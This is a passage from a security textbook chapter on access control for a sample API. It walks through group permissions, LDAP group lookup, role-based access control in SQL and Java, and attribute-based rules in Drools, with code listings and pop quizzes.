or you can create two separate permission tables and define a view that performs a
union of the two:
CREATE TABLE user_permissions(…);
CREATE TABLE group_permissions(…);
CREATE VIEW permissions(space_id, user_or_group_id, perms) AS
SELECT space_id, user_id, perms FROM user_permissions
UNION ALL
SELECT space_id, group_id, perms FROM group permissions;
To determine if a user has appropriate permissions, you would query first for individ-
ual user permissions and then for permissions associated with any groups the user is a
member of. This can be accomplished in a single query, as shown in listing 8.2, which
adjusts the requirePermission method in UserController to take groups into
account by building a dynamic SQL query that checks the permissions table for both
the username from the subject attribute of the request and any groups the user is a
member of. Dalesbred has support for safely constructing dynamic queries in its Query-
Builder class, so you can use that here for simplicity.
TIP
When building dynamic SQL queries, be sure to use only placeholders
and never include user input directly in the query being built to avoid SQL
injection attacks, which are discussed in chapter 2. Some databases support
temporary tables, which allow you to insert dynamic values into the temporary
table and then perform a SQL JOIN against the temporary table in your
query. Each transaction sees its own copy of the temporary table, avoiding the
need to generate dynamic queries.
public Filter requirePermission(String method, String permission) {
return (request, response) -> {
if (!method.equals(request.requestMethod())) {
return;
}
requireAuthentication(request, response);
var spaceId = Long.parseLong(request.params(":spaceId"));
var username = (String) request.attribute("subject");
List<String> groups = request.attribute("groups");
var queryBuilder = new QueryBuilder(
"SELECT perms FROM permissions " +
"WHERE space_id = ? " +
"AND (user_or_group_id = ?", spaceId, username);
Listing 8.2
Taking groups into account when looking up permissions
Allow either a
user or group ID.
Look up the
groups the
user is a
member of.
Build a dynamic
query to check
permissions
for the user.
271
Users and groups
for (var group : groups) {
queryBuilder.append(" OR user_or_group_id = ?", group);
}
queryBuilder.append(")");
var perms = database.findAll(String.class,
queryBuilder.build());
if (perms.stream().noneMatch(p -> p.contains(permission))) {
halt(403);
}
};
}
You may be wondering why you would split out looking up the user’s groups during
authentication to then just use them in a second query against the permissions table
during access control. It would be more efficient instead to perform a single query
that automatically checked the groups for a user using a JOIN or sub-query against the
group membership table, such as the following:
SELECT perms FROM permissions
WHERE space_id = ?
AND (user_or_group_id = ?
OR user_or_group_id IN
(SELECT DISTINCT group_id
FROM group_members
WHERE user_id = ?))
Although this query is more efficient, it is unlikely that the extra query of the original
design will become a significant performance bottleneck. But combining the queries
into one has a significant drawback in that it violates the layering of authentication
and access control. As far as possible, you should ensure that all user attributes
required for access control decisions are collected during the authentication step, and
then decide if the request is authorized using these attributes. As a concrete example
of how violating this layering can cause problems, consider what would happen if you
changed your API to use an external user store such as LDAP (discussed in the next
section) or an OpenID Connect identity provider (chapter 7). In these cases, the
groups that a user is a member of are likely to be returned as additional attributes
during authentication (such as in the ID token JWT) rather than exist in the API’s
own database.
8.1.1
LDAP groups
In many large organizations, including most companies, users are managed centrally
in an LDAP (Lightweight Directory Access Protocol) directory. LDAP is designed for
storing user information and has built-in support for groups. You can learn more
about LDAP at https://ldap.com/basic-ldap-concepts/. The LDAP standard defines
the following two forms of groups:
Include any
groups in
the query.
Fail if none of the permissions for
the user or groups allow this action.
Check for
permissions for
this user directly.
Check for permissions
for any groups the user
is a member of.
272
CHAPTER 8
Identity-based access control
1
Static groups are defined using the groupOfNames or groupOfUniqueNames object
classes,1 which explicitly list the members of the group using the member or
uniqueMember attributes. The difference between the two is that groupOfUnique-
Names forbids the same member being listed twice.
2
Dynamic groups are defined using the groupOfURLs object class, where the mem-
bership of the group is given by a collection of LDAP URLs that define search
queries against the directory. Any entry that matches one of the search URLs is
a member of the group.
Some directory servers also support virtual static groups, which look like static groups
but query a dynamic group to determine the membership. Dynamic groups can be
useful when groups become very large, because they avoid having to explicitly list
every member of the group, but they can cause performance problems as the server
needs to perform potentially expensive search operations to determine the mem-
bers of a group.
To find which static groups a user is a member of in LDAP, you must perform a
search against the directory for all groups that have that user’s distinguished name as a
value of their member attribute, as shown in listing 8.3. First, you need to connect to
the LDAP server using the Java Naming and Directory Interface (JNDI) or another
LDAP client library. Normal LDAP users typically are not permitted to run searches,
so you should use a separate JNDI InitialDirContext for looking up a user’s groups,
configured to use a connection user that has appropriate permissions. To find the
groups that a user is in, you can use the following search filter, which finds all LDAP
groupOfNames entries that contain the given user as a member:
(&(objectClass=groupOfNames)(member=uid=test,dc=example,dc=org))
To avoid LDAP injection vulnerabilities (explained in chapter 2), you can use the
facilities in JNDI to let search filters have parameters. JNDI will then make sure that
any user input in these parameters is properly escaped before passing it to the LDAP
directory. To use this, replace the user input in the field with a numbered parameter
(starting at 0) in the form {0} or {1} or {2}, and so on, and then supply an Object
array with the actual arguments to the search method. The names of the groups can
then be found by looking up the CN (Common Name) attribute on the results.
import javax.naming.*;
import javax.naming.directory.*;
import java.util.*;
private List<String> lookupGroups(String username)
throws NamingException {
var props = new Properties();
1 An object class in LDAP defines the schema of a directory entry, describing which attributes it contains.
Listing 8.3
Looking up LDAP groups for a user
273
Users and groups
props.put(Context.INITIAL_CONTEXT_FACTORY,
"com.sun.jndi.ldap.LdapCtxFactory");
props.put(Context.PROVIDER_URL, ldapUrl);
props.put(Context.SECURITY_AUTHENTICATION, "simple");
props.put(Context.SECURITY_PRINCIPAL, connUser);
props.put(Context.SECURITY_CREDENTIALS, connPassword);
var directory = new InitialDirContext(props);
var searchControls = new SearchControls();
searchControls.setSearchScope(
SearchControls.SUBTREE_SCOPE);
searchControls.setReturningAttributes(
new String[]{"cn"});
var groups = new ArrayList<String>();
var results = directory.search(
"ou=groups,dc=example,dc=com",
"(&(objectClass=groupOfNames)" +
"(member=uid={0},ou=people,dc=example,dc=com))",
new Object[]{ username },
searchControls);
while (results.hasMore()) {
var result = results.next();
groups.add((String) result.getAttributes()
.get("cn").get(0));
}
directory.close();
return groups;
}
To make looking up the groups a user belongs to more efficient, many directory serv-
ers support a virtual attribute on the user entry itself that lists the groups that user is a
member of. The directory server automatically updates this attribute as the user is
added to and removed from groups (both static and dynamic). Because this attribute
is nonstandard, it can have different names but is often called isMemberOf or some-
thing similar. Check the documentation for your LDAP server to see if it provides such
an attribute. Typically, it is much more efficient to read this attribute than to search
for the groups that a user is a member of.
TIP
If you need to search for groups regularly, it can be worthwhile to cache
the results for a short period to prevent excessive searches on the directory.
Set up the
connection details
for the LDAP server.
Search for all
groups with the
user as a member.
Use query parameters
to avoid LDAP injection
vulnerabilities.
Extract the CN attribute
of each group the user
is a member of.
274
CHAPTER 8
Identity-based access control
8.2
Role-based access control
Although groups can make managing large numbers of users simpler, they do not
fully solve the difficulties of managing permissions for a complex API. First, almost all
implementations of groups still allow permissions to be assigned to individual users as
well as to groups. This means that to work out who has access to what, you still often
need to examine the permissions for all users as well as the groups they belong to. Sec-
ond, because groups are often used to organize users for a whole organization (such
as in a central LDAP directory), they sometimes cannot be very useful distinctions for
your API. For example, the LDAP directory might just have a group for all software
engineers, but your API needs to distinguish between backend and frontend engi-
neers, QA, and scrum masters. If you cannot change the centrally managed groups,
then you are back to managing permissions for individual users. Finally, even when
groups are a good fit for an API, there may be large numbers of fine-grained permis-
sions assigned to each group, making it difficult to review the permissions.
To address these drawbacks, role-based access control (RBAC) introduces the notion
of role as an intermediary between users and permissions, as shown in figure 8.2.
Pop quiz
1
True or False: In general, can groups contain other groups as members?
2
Which three of the following are common types of LDAP groups?
a
Static groups
b
Abelian groups
c
Dynamic groups
d
Virtual static groups
e
Dynamic static groups
f
Virtual dynamic groups
3
Given the following LDAP filter:
(&(objectClass=#A)(member=uid=alice,dc=example,dc=com))
which one of the following object classes would be inserted into the position
marked #A to search for static groups Alice belongs to?
a
group
b
herdOfCats
c
groupOfURLs
d
groupOfNames
e
gameOfThrones
f
murderOfCrows
g
groupOfSubjects
The answers are at the end of the chapter.
275
Role-based access control
Permissions are no longer directly assigned to users (or to groups). Instead, permis-
sions are assigned to roles, and then roles are assigned to users. This can dramatically
simplify the management of permissions, because it is much simpler to assign some-
body the “moderator” role than to remember exactly which permissions a moderator
is supposed to have. If the permissions change over time, then you can simply change
the permissions associated with a role without needing to update the permissions for
many users and groups individually.
In principle, everything that you can accomplish with RBAC could be accom-
plished with groups, but in practice there are several differences in how they are used,
including the following:
Groups are used primarily to organize users, while roles are mainly used as a
way to organize permissions.
As discussed in the previous section, groups tend to be assigned centrally,
whereas roles tend to be specific to a particular application or API. As an exam-
ple, every API may have an admin role, but the set of users that are administra-
tors may differ from API to API.
Group-based systems often allow permissions to be assigned to individual users,
but RBAC systems typically don’t allow that. This restriction can dramatically
simplify the process of reviewing who has access to what.
RBAC systems split the definition and assigning of permissions to roles from the
assignment of users to those roles. It is much less error-prone to assign a user to
a role than to work out which permissions each role should have, so this is a use-
ful separation of duties that improves security.
Roles may have a dynamic element. For example, some military and other envi-
ronments have the concept of a duty officer, who has particular privileges and
responsibilities only during their shift. When the shift ends, they hand over to
the next duty officer, who takes on that role.
RBAC is almost always used as a form of mandatory access control, with roles being
described and assigned by whoever controls the systems that are being accessed. It is
much less common to allow users to assign roles to other users the way they can with
permissions in discretionary access control approaches. Instead, it is common to layer
User
Moderator
role
Permission
Permission
Permission
Permission
Admin role
Users are assigned roles.
Permissions are assigned to
roles, never directly to users.
Figure 8.2
In RBAC, permissions
are assigned to roles rather than
directly to users. Users are then
assigned to roles, depending on
their required level of access.
276
CHAPTER 8
Identity-based access control
a DAC mechanism such as OAuth2 (chapter 7) over an underlying RBAC system so
that a user with a moderator role, for example, can delegate some part of their per-
missions to a third party. Some RBAC systems give users some discretion over which
roles they use when performing API operations. For example, the same user may be
able to send messages to a chatroom as themselves or using their role as Chief Finan-
cial Officer when they want to post an official statement. The NIST (National Institute
of Standards and Technology) standard RBAC model (http://mng.bz/v9eJ) includes
a notion of session, in which a user can choose which of their roles are active at a
given time when making API requests. This works similarly to scoped tokens in
OAuth, allowing a session to activate only a subset of a user’s roles, reducing the dam-
age if the session is compromised. In this way, RBAC also better supports the principle
of least privilege than groups because a user can act with only a subset of their full
authority.
8.2.1
Mapping roles to permissions
There are two basic approaches to mapping roles to lower-level permissions inside
your API. The first is to do away with permissions altogether and instead to just anno-
tate each operation in your API with the role or roles that can call that operation. In
this case, you’d replace the existing requirePermission filter with a new requireRole
filter that enforced role requirements instead. This is the approach taken in Java
Enterprise Edition (Java EE) and the JAX-RS framework, where methods can be anno-
tated with the @RolesAllowed annotation to describe which roles can call that method
via an API, as shown in listing 8.4.
import javax.ws.rs.*;
import javax.ws.rs.core.*;
import javax.annotation.security.*;
@DeclareRoles({"owner", "moderator", "member"})
@Path("/spaces/{spaceId}/members")
public class SpaceMembersResource {
@POST
@RolesAllowed("owner")
public Response addMember() { .. }
@GET
@RolesAllowed({"owner", "moderator"})
public Response listMembers() { .. }
}
The second approach is to retain an explicit notion of lower-level permissions, like
those currently used in the Natter API, and to define an explicit mapping from roles
to permissions. This can be useful if you want to allow administrators or other users to
Listing 8.4
Annotating methods with roles in Java EE
Role annotations are in the
javax.annotation.security package.
Declare roles with
the @DeclareRoles
annotation.
Describe role
restrictions with the
@RolesAllowed
annotation.
277
Role-based access control
define new roles from scratch, and it also makes it easier to see exactly what permis-
sions a role has been granted without having to examine the source code of the API.
Listing 8.5 shows the SQL needed to define four new roles based on the existing Nat-
ter API permissions:
The social space owner has full permissions.
A moderator can read posts and delete offensive posts.
A normal member can read and write posts, but not delete any.
An observer is only allowed to read posts and not write their own.
Open src/main/resources/schema.sql in your editor and add the lines from listing
8.5 to the end of the file and click save. You can also delete the existing permissions
table (and associated GRANT statements) if you wish.
CREATE TABLE role_permissions(
role_id VARCHAR(30) NOT NULL PRIMARY KEY,
perms VARCHAR(3) NOT NULL
);
INSERT INTO role_permissions(role_id, perms)
VALUES ('owner', 'rwd'),
('moderator', 'rd'),
('member', 'rw'),
('observer', 'r');
GRANT SELECT ON role_permissions TO natter_api_user;
8.2.2
Static roles
Now that you’ve defined how roles map to permissions, you just need to decide how to
map users to roles. The most common approach is to statically define which users (or
groups) are assigned to which roles. This is the approach taken by most Java EE appli-
cation servers, which define configuration files to list the users and groups that should
be assigned different roles. You can implement the same kind of approach in the Nat-
ter API by adding a new table to map users to roles within a social space. Roles in the
Natter API are scoped to each social space so that the owner of one social space can-
not make changes to another.
DEFINITION
When users, groups, or roles are confined to a subset of your
application, this is known as a security domain or realm.
Listing 8.6 shows the SQL to create a new table to map a user in a social space to a
role. Open schema.sql again and add the new table definition to the file. The
user_roles table, together with the role_permissions table, take the place of the old
permissions table. In the Natter API, you’ll restrict a user to having just one role
within a space, so you can add a primary key constraint on the space_id and user_id
fields. If you wanted to allow more than one role you could leave this out and manually
Listing 8.5
Role permissions for the Natter API
Each role grants a
set of permissions.
Define roles
for Natter
social spaces.
Because the roles
are fixed, the API is
granted read-only
access.
278
CHAPTER 8
Identity-based access control
add an index on those fields instead. Don’t forget to grant permissions to the Natter
API database user.
CREATE TABLE user_roles(
space_id INT NOT NULL REFERENCES spaces(space_id),
user_id VARCHAR(30) NOT NULL REFERENCES users(user_id),
role_id VARCHAR(30) NOT NULL REFERENCES role_permissions(role_id),
PRIMARY KEY (space_id, user_id)
);
GRANT SELECT, INSERT, DELETE ON user_roles TO natter_api_user;
To grant roles to users, you need to update the two places where permissions are cur-
rently granted inside the SpaceController class:
In the createSpace method, the owner of the new space is granted full permis-
sions. This should be updated to instead grant the owner role.
In the addMember method, the request contains the permissions for the new
member. This should be changed to accept a role for the new member instead.
The first task is accomplished by opening the SpaceController.java file and finding the
line inside the createSpace method where the insert into the permissions table state-
ment is. Remove those lines and replace them instead with the following to insert a
new role assignment:
database.updateUnique(
"INSERT INTO user_roles(space_id, user_id, role_id) " +
"VALUES(?, ?, ?)", spaceId, owner, "owner");
Updating addMember involves a little more code, because you should ensure that you
validate the new role. Add the following line to the top of the class to define the
valid roles:
private static final Set<String> DEFINED_ROLES =
Set.of("owner", "moderator", "member", "observer");
You can now update the implementation of the addMember method to be role-based
instead of permission-based, as shown in listing 8.7. First, extract the desired role from
the request and ensure it is a valid role name. You can default to the member role if
none is specified as this is the normal role for most members. It is then simply a case
of inserting the role into the user_roles table instead of the old permissions table
and returning the assigned role in the response.
public JSONObject addMember(Request request, Response response) {
var json = new JSONObject(request.body());
Listing 8.6
Mapping static roles
Listing 8.7
Adding new members with roles
Map users to
roles within
a space.
Natter restricts
each user to have
only one role.
Grant permissions to the Natter database user.
279
Role-based access control
var spaceId = Long.parseLong(request.params(":spaceId"));
var userToAdd = json.getString("username");
var role = json.optString("role", "member");
if (!DEFINED_ROLES.contains(role)) {
throw new IllegalArgumentException("invalid role");
}
database.updateUnique(
"INSERT INTO user_roles(space_id, user_id, role_id)" +
" VALUES(?, ?, ?)", spaceId, userToAdd, role);
response.status(200);
return new JSONObject()
.put("username", userToAdd)
.put("role", role);
}
8.2.3
Determining user roles
The final step of the puzzle is to determine which roles a user has when they make a
request to the API and the permissions that each role allows. This can be found by look-
ing up the user in the user_roles table to discover their role for a given space, and then
looking up the permissions assigned to that role in the role_permissions table. In con-
trast to the situation with groups in section 8.1, roles are usually specific to an API, so it
is less likely that you would be told a user’s roles as part of authentication. For this rea-
son, you can combine the lookup of roles and the mapping of roles into permissions
into a single database query, joining the two tables together, as follows:
SELECT rp.perms
FROM role_permissions rp
JOIN user_roles ur
ON ur.role_id = rp.role_id
WHERE ur.space_id = ? AND ur.user_id = ?
Searching the database for roles and permissions can be expensive, but the current
implementation will repeat this work every time the requirePermission filter is
called, which could be several times while processing a request. To avoid this issue and
simplify the logic, you can extract the permission look up into a separate filter that
runs before any permission checks and stores the permissions in a request attribute.
Listing 8.8 shows the new lookupPermissions filter that performs the mapping from
user to role to permissions, and then updated requirePermission method. By reus-
ing the existing permissions checks, you can add RBAC on top without having to
change the access control rules. Open UserController.java in your editor and update
the requirePermission method to match the listing.
public void lookupPermissions(Request request, Response response) {
requireAuthentication(request, response);
Listing 8.8
Determining permissions based on roles
Extract the role
from the input
and validate it.
Insert the
new role
assignment
for this
space.
Return the role in
the response.
280
CHAPTER 8
Identity-based access control
var spaceId = Long.parseLong(request.params(":spaceId"));
var username = (String) request.attribute("subject");
var perms = database.findOptional(String.class,
"SELECT rp.perms " +
" FROM role_permissions rp JOIN user_roles ur" +
" ON rp.role_id = ur.role_id" +
" WHERE ur.space_id = ? AND ur.user_id = ?",
spaceId, username).orElse("");
request.attribute("perms", perms);
}
public Filter requirePermission(String method, String permission) {
return (request, response) -> {
if (!method.equals(request.requestMethod())) {
return;
}
var perms = request.<String>attribute("perms");
if (!perms.contains(permission)) {
halt(403);
}
};
}
You now need to add calls to the new filter to ensure permissions are looked up. Open
the Main.java file and add the following lines to the main method, before the defini-
tion of the postMessage operation:
before("/spaces/:spaceId/messages",
userController::lookupPermissions);
before("/spaces/:spaceId/messages/*",
userController::lookupPermissions);
before("/spaces/:spaceId/members",
userController::lookupPermissions);
If you restart the API server you can now add users, create spaces, and add members
using the new RBAC approach. All the existing permission checks on API operations
are still enforced, only now they are managed using roles instead of explicit permis-
sion assignments.
8.2.4
Dynamic roles
Though static role assignments are the most common, some RBAC systems allow
more dynamic queries to determine which roles a user should have. For example, a
call center worker might be granted a role that allows them access to customer
records so that they can respond to customer support queries. To reduce the risk of
misuse, the system could be configured to grant the worker this role only during their
contracted working hours, perhaps based on their shift times. Outside of these times
the user would not be granted the role, and so would be denied access to customer
records if they tried to access them.
Determine user
permissions by
mapping user
to role to
permissions.
Store
permissions
in a request
attribute.
Retrieve
permissions
from the
request before
checking.
281
Role-based access control
Although dynamic role assignments have been implemented in several systems,
there is no clear standard for how to build dynamic roles. Approaches are usually
based on database queries or perhaps based on rules specified in a logical form
such as Prolog or the Web Ontology Language (OWL). When more flexible access
control rules are required, attribute-based access control (ABAC) has largely replaced
RBAC, as discussed in section 8.3. NIST has attempted to integrate ABAC with RBAC
to gain the best of both worlds (http://mng.bz/4BMa), but this approach is not widely
adopted.
Other RBAC systems implement constraints, such as making two roles mutually
exclusive; a user can’t have both roles at the same time. This can be useful for enforc-
ing separation of duties, such as preventing a system administrator from also manag-
ing audit logs for a sensitive system.
Pop quiz
4
Which of the following are more likely to apply to roles than to groups?
a
Roles are usually bigger than groups.
b
Roles are usually smaller than groups.
c
All permissions are assigned using roles.
d
Roles better support separation of duties.
e
Roles are more likely to be application specific.
f
Roles allow permissions to be assigned to individual users.
5
What is a session used for in the NIST RBAC model? Pick one answer.
a
To allow users to share roles.
b
To allow a user to leave their computer unlocked.
c
To allow a user to activate only a subset of their roles.
d
To remember the users name and other identity attributes.
e
To allow a user to keep track of how long they have worked.
6
Given the following method definition
@<annotation here>
public Response adminOnlyMethod(String arg);
what annotation value can be used in the Java EE and JAX-RS role system to
restrict the method to only be called by users with the ADMIN role?
a
@DenyAll
b
@PermitAll
c
@RunAs("ADMIN")
d
@RolesAllowed("ADMIN")
e
@DeclareRoles("ADMIN")
The answers are at the end of the chapter.
282
CHAPTER 8
Identity-based access control
8.3
Attribute-based access control
Although RBAC is a very successful access control model that has been widely deployed,
in many cases the desired access control policies cannot be expressed through simple
role assignments. Consider the call center agent example from section 8.2.4. As well as
preventing the agent from accessing customer records outside of their contracted
working hours, you might also want to prevent them accessing those records if they
are not actually on a call with that customer. Allowing each agent to access all cus-
tomer records during their working hours is still more authority than they really need
to get their job done, violating the principle of least privilege. It may be that you can
determine which customer the call agent is talking to from their phone number
(caller ID), or perhaps the customer enters an account number using the keypad
before they are connected to an agent. You’d like to only allow the agent access to just
that customer’s file for the duration of the call, perhaps allowing five minutes after-
ward for them to finishing writing any notes.
To handle these kinds of dynamic access control decisions, an alternative to RBAC
has been developed known as ABAC: attribute-based access control. In ABAC, access con-
trol decisions are made dynamically for each API request using collections of attri-
butes grouped into four categories:
Attributes about the subject; that is, the user making the request. This could include
their username, any groups they belong to, how they were authenticated, when
they last authenticated, and so on.
Attributes about the resource or object being accessed, such as the URI of the
resource or a security label (TOP SECRET, for example).
Attributes about the action the user is trying to perform, such as the HTTP method.
Attributes about the environment or context in which the operation is taking place.
This might include the local time of day, or the location of the user performing
the action.
The output of ABAC is then an allow or deny decision, as shown in figure 8.3.
ABAC
Subject attributes
Resource attributes
Action attributes
Environment attributes
Permit/Deny
Attributes related to an API request
are fed into the ABAC system.
A decision is made based on the
attributes and configured security policy.
Figure 8.3
In an ABAC system, access control decisions are made dynamically based
on attributes describing the subject, resource, action, and environment or context of the
API request.
283
Attribute-based access control
Listing 8.9 shows example code for gathering attribute values to feed into an ABAC
decision process in the Natter API. The code implements a Spark filter that can be
included before any API route definition in place of the existing requirePermission
filters. The actual implementation of the ABAC permission check is left abstract for
now; you will develop implementations in the next sections. The code collects attri-
butes into the four attribute categories described above by examining the Spark
Request object and extracting the username and any groups populated during
authentication. You can include other attributes, such as the current time, in the envi-
ronment properties. Extracting these kind of environmental attributes makes it easier
to test the access control rules because you can easily pass in different times of day in
your tests. If you’re using JWTs (chapter 6), then you might want to include claims
from the JWT Claims Set in the subject attributes, such as the issuer or the issued-at
time. Rather than using a simple boolean value to indicate the decision, you should
use a custom Decision class. This is used to combine decisions from different policy
rules, as you’ll see in section 8.3.1.
package com.manning.apisecurityinaction.controller;
import java.time.LocalTime;
import java.util.Map;
import spark.*;
import static spark.Spark.halt;
public abstract class ABACAccessController {
public void enforcePolicy(Request request, Response response) {
var subjectAttrs = new HashMap<String, Object>();
subjectAttrs.put("user", request.attribute("subject"));
subjectAttrs.put("groups", request.attribute("groups"));
var resourceAttrs = new HashMap<String, Object>();
resourceAttrs.put("path", request.pathInfo());
resourceAttrs.put("space", request.params(":spaceId"));
var actionAttrs = new HashMap<String, Object>();
actionAttrs.put("method", request.requestMethod());
var envAttrs = new HashMap<String, Object>();
envAttrs.put("timeOfDay", LocalTime.now());
envAttrs.put("ip", request.ip());
var decision = checkPermitted(subjectAttrs, resourceAttrs,
actionAttrs, envAttrs);
if (!decision.isPermitted()) {
halt(403);
Listing 8.9
Gathering attribute values
Gather relevant
attributes and
group them into
categories.
Check whether
the request is
permitted.
If not, halt with a 403
Forbidden error.
284
CHAPTER 8
Identity-based access control
}
}
abstract Decision checkPermitted(
Map<String, Object> subject,
Map<String, Object> resource,
Map<String, Object> action,
Map<String, Object> env);
public static class Decision {
}
}
8.3.1
Combining decisions
When implementing ABAC, typically access control decisions are structured as a set
of independent rules describing whether a request should be permitted or denied.
If more than one rule matches a request, and they have different outcomes, then
the question is which one should be preferred. This boils down to the two following
questions:
What should the default decision be if no access control rules match the request?
How should conflicting decisions be resolved?
The safest option is to default to denying requests unless explicitly permitted by some
access rule, and to give deny decisions priority over permit decisions. This requires at
least one rule to match and decide to permit the action and no rules to decide to deny
the action for the request to be allowed. When adding ABAC on top of an existing
access control system to enforce additional constraints that cannot be expressed in
the existing system, it can be simpler to instead opt for a default permit strategy where
requests are permitted to proceed if no ABAC rules match at all. This is the approach
you’ll take with the Natter API, adding additional ABAC rules that deny some requests
and let all others through. In this case, the other requests may still be rejected by the
existing RBAC permissions enforced earlier in the chapter.
The logic for implementing this default permit with deny overrides strategy is
shown in the Decision class in listing 8.10. The permit variable is initially set to true
but any call to the deny() method will set it to false. Calls to the permit() method are
ignored because this is the default unless another rule has called deny() already, in
which case the deny should take precedence. Open ABACAccessController.java in
your editor and add the Decision class as an inner class.
public static class Decision {
private boolean permit = true;
public void deny() {
permit = false;
}
Listing 8.10
Implementing decision combining
The Decision class will
be described next.
Default to
permit
An explicit deny decision
overrides the default.
285
Attribute-based access control
public void permit() {
}
boolean isPermitted() {
return permit;
}
}
8.3.2
Implementing ABAC decisions
Although you could implement ABAC access control decisions directly in Java or
another programming language, it’s often clearer if the policy is expressed in the
form of rules or domain-specific language (DSL) explicitly designed to express access
control decisions. In this section you’ll implement a simple ABAC decision engine
using the Drools (https://drools.org) business rules engine from Red Hat. Drools can
be used to write all kinds of business rules and provides a convenient syntax for
authoring access control rules.
TIP
Drools is part of a larger suite of tools marketed under the banner
“Knowledge is Everything,” so many classes and packages used in Drools
include the kie abbreviation in their names.
To add the Drools rule engine to the Natter API project, open the pom.xml file in
your editor and add the following dependencies to the <dependencies> section:
<dependency>
<groupId>org.kie</groupId>
<artifactId>kie-api</artifactId>
<version>7.26.0.Final</version>
</dependency>
<dependency>
<groupId>org.drools</groupId>
<artifactId>drools-core</artifactId>
<version>7.26.0.Final</version>
</dependency>
<dependency>
<groupId>org.drools</groupId>
<artifactId>drools-compiler</artifactId>
<version>7.26.0.Final</version>
</dependency>
When it starts up, Drools will look for a file called kmodule.xml on the classpath that
defines the configuration. You can use the default configuration, so navigate to the
folder src/main/resources and create a new folder named META-INF under resources.
Then create a new file called kmodule.xml inside the src/main/resource/META-INF
folder with the following contents:
<?xml version="1.0" encoding="UTF-8" ?>
<kmodule xmlns="http://www.drools.org/xsd/kmodule">
</kmodule>
Explicit permit
decisions are
ignored.
286
CHAPTER 8
Identity-based access control
You can now implement a version of the ABACAccessController class that evaluates
decisions using Drools. Listing 8.11 shows code that implements the checkPermitted
method by loading rules from the classpath using KieServices.get().getKie-
ClasspathContainer().
To query the rules for a decision, you should first create a new KIE session and set
an instance of the Decision class from the previous section as a global variable that the
rules can access. Each rule can then call the deny() or permit() methods on this
object to indicate whether the request should be allowed. The attributes can then be
added to the working memory for Drools using the insert() method on the session.
Because Drools prefers strongly typed values, you can wrap each set of attributes in a
simple wrapper class to distinguish them from each other (described shortly). Finally,
call session.fireAllRules() to evaluate the rules against the attributes and then
check the value of the decision variable to determine the final decision. Create a new
file named DroolsAccessController.java inside the controller folder and add the con-
tents of listing 8.11.
package com.manning.apisecurityinaction.controller;
import java.util.*;
import org.kie.api.KieServices;
import org.kie.api.runtime.KieContainer;
public class DroolsAccessController extends ABACAccessController {
private final KieContainer kieContainer;
public DroolsAccessController() {
this.kieContainer = KieServices.get().getKieClasspathContainer();
}
@Override
boolean checkPermitted(Map<String, Object> subject,
Map<String, Object> resource,
Map<String, Object> action,
Map<String, Object> env) {
var session = kieContainer.newKieSession();
try {
var decision = new Decision();
session.setGlobal("decision", decision);
session.insert(new Subject(subject));
session.insert(new Resource(resource));
session.insert(new Action(action));
session.insert(new Environment(env));
session.fireAllRules();
return decision.isPermitted();
Listing 8.11
Evaluating decisions with Drools
Load all rules
found in the
classpath.
Start a new
Drools session.
Create a Decision
object and set it as
a global variable
named “decision.”
Insert facts for
each category
of attributes.
Run the rule engine
to see which rules
match the request
and check the
decision.
287
Attribute-based access control
} finally {
session.dispose();
}
}
}
As mentioned, Drools likes to work with strongly typed values, so you can wrap each
collection of attributes in a distinct class to make it simpler to write rules that match
each one, as shown in listing 8.12. Open DroolsAccessController.java in your editor
again and add the four wrapper classes from the following listing as inner classes to
the DroolsAccessController class.
public static class Subject extends HashMap<String, Object> {
Subject(Map<String, Object> m) { super(m); }
}
public static class Resource extends HashMap<String, Object> {
Resource(Map<String, Object> m) { super(m); }
}
public static class Action extends HashMap<String, Object> {
Action(Map<String, Object> m) { super(m); }
}
public static class Environment extends HashMap<String, Object> {
Environment(Map<String, Object> m) { super(m); }
}
You can now start writing access control rules. Rather than reimplementing all the
existing RBAC access control checks, you will just add an additional rule that prevents
moderators from deleting messages outside of normal office hours. Create a new file
accessrules.drl in the folder src/main/resources to contain the rules. Listing 8.13 lists
the example rule. As for Java, a Drools rule file can contain a package and import
statements, so use those to import the Decision and wrapper class you’ve just created.
Next, you need to declare the global decision variable that will be used to communi-
cate the decision by the rules. Finally, you can implement the rules themselves. Each
rule has the following form:
rule "description"
when
conditions
then
actions
end
The description can be any useful string to describe the rule. The conditions of the
rule match classes that have been inserted into the working memory and consist of
Listing 8.12
Wrapping attributes in types
Dispose of the
session when
finished.
Wrapper for
subject-related
attributes
Wrapper for
resource-related
attributes
288
CHAPTER 8
Identity-based access control
the class name followed by a list of constraints inside parentheses. In this case,
because the classes are maps, you can use the this["key"] syntax to match attributes
inside the map. For this rule, you should check that the HTTP method is DELETE
and that the hour field of the timeOfDay attribute is outside of the allowed 9-to-5
working hours. If the rule matches, the action of the rule will call the deny() method
of the decision global variable. You can find more detailed information about writing
Drools rules on the https://drools.org website, or from the book Mastering JBoss Drools 6,
by Mauricio Salatino, Mariano De Maio, and Esteban Aliverti (Packt, 2016).
package com.manning.apisecurityinaction.rules;
import com.manning.apisecurityinaction.controller.
➥ DroolsAccessController.*;
import com.manning.apisecurityinaction.controller.
➥ ABACAccessController.Decision;
global Decision decision;
rule "deny moderation outside office hours"
when
Action( this["method"] == "DELETE" )
Environment( this["timeOfDay"].hour < 9
|| this["timeOfDay"].hour > 17 )
then
decision.deny();
end
Now that you have written an ABAC rule you can wire up the main method to apply
your rules as a Spark before() filter that runs before the other access control rules.
The filter will call the enforcePolicy method inherited from the ABACAccess-
Controller (listing 8.9), which populates the attributes from the requests. The base
class then calls the checkDecision method from listing 8.11, which will use Drools to
evaluate the rules. Open Main.java in your editor and add the following lines to the
main() method just before the route definitions in that file:
var droolsController = new DroolsAccessController();
before("/*", droolsController::enforcePolicy);
Restart the API server and make some sample requests to see if the policy is being
enforced and is not interfering with the existing RBAC permission checks. To check
that DELETE requests are being rejected outside of office hours, you can either adjust
your computer’s clock to a different time, or you can adjust the time of day environ-
ment attribute to artificially set the time of day to 11 p.m. Open ABACAccessController
.java and change the definition of the timeOfDay attribute as follows:
envAttrs.put("timeOfDay", LocalTime.now().withHour(23));
Listing 8.13
An example ABAC rule
Add package
and import
statements just
like Java.
Declare the
decision
global
variable.
A rule has a description,
a when section with
patterns, and a then
section with actions.
Patterns
match the
attributes.
The action can call the permit or
deny methods on the decision.
289
Attribute-based access control
If you then try to make any DELETE request to the API it’ll be rejected:
$ curl -i -X DELETE \
-u demo:password https://localhost:4567/spaces/1/messages/1
HTTP/1.1 403 Forbidden
…
TIP
It doesn’t matter if you haven’t implemented any DELETE methods in
the Natter API, because the ABAC rules will be applied before the request is
matched to any endpoints (even if none exist). The Natter API implementa-
tion in the GitHub repository accompanying this book has implementations
